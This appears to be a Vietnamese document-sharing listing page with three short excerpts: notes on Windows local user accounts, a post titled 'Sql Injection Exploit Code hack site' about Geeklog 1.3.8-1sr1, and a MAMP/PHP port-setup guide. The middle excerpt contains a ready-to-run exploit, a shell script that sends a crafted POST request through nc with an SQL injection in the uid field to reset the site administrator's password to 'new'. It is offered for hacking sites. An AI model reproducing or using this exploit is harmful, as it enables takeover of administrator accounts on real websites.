Change your password
-
LOCAL USER ACCOUNT I. Sơ lược về Local User Account: Local user account là tài khoản cá nhân của từng user, được tạo và lưu trữ trong một cơ sở dữ liệu SAM (Security Accounts Manager) trên mỗi máy tính (Local Computer), được đặt trong thư mục \Windows\system32\config. Có 2 loại user account: Computer Administrator: - Create, change and delete user account - Make system-wide changes - Install programs and access all files Limited: - Change or remove your password, - Change your picture, themes, and other desktop settings, - View files you created. Built-in User Account: Tại Local computer,.
13p babylove117x 26-03-2011 151 18 Download
-
Sql Injection Exploit Code hack site Geeklog version 1.3.8-1sr1 Đôi nét về greedlog.net http://www.geeklog.net/ Đây là một dạng portal download free dùng rất nhiều cho site tin tức vvvv khá phổ biến. Lỗi sql injection được tìm thấy trong file users.php 2.code khai thác Exploit: #!/bin/sh echo "POST /path/to/gl/users.php HTTP/1.0 Content-length: 50 Content-type: application/x-www-form-urlencoded mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&" | nc localhost 80 This should change the Admin user's password to "new". You have to change the /path/to/gl/users.
2p tt1991tt 20-02-2011 239 68 Download
-
GETTING READY TO WORK WITH PHP Figure 2-7. Changing the Apache and MySQL ports 4. Click Set to default Apache and MySQL ports, as shown in Figure 2-7. The numbers change to the standard ports: 80 for Apache and 3306 for MySQL. Click OK, and enter your Mac password when prompted. MAMP restarts both servers. 5. If any other program is using port 80, Apache won't restart. If you can't find what's preventing Apache from using port 80, open the MAMP preference panel, and click Reset MAMP ports. 6. When both lights are green again, click Open start page in the MAMP Control Panel. This...
10p yukogaru14 30-11-2010 130 36 Download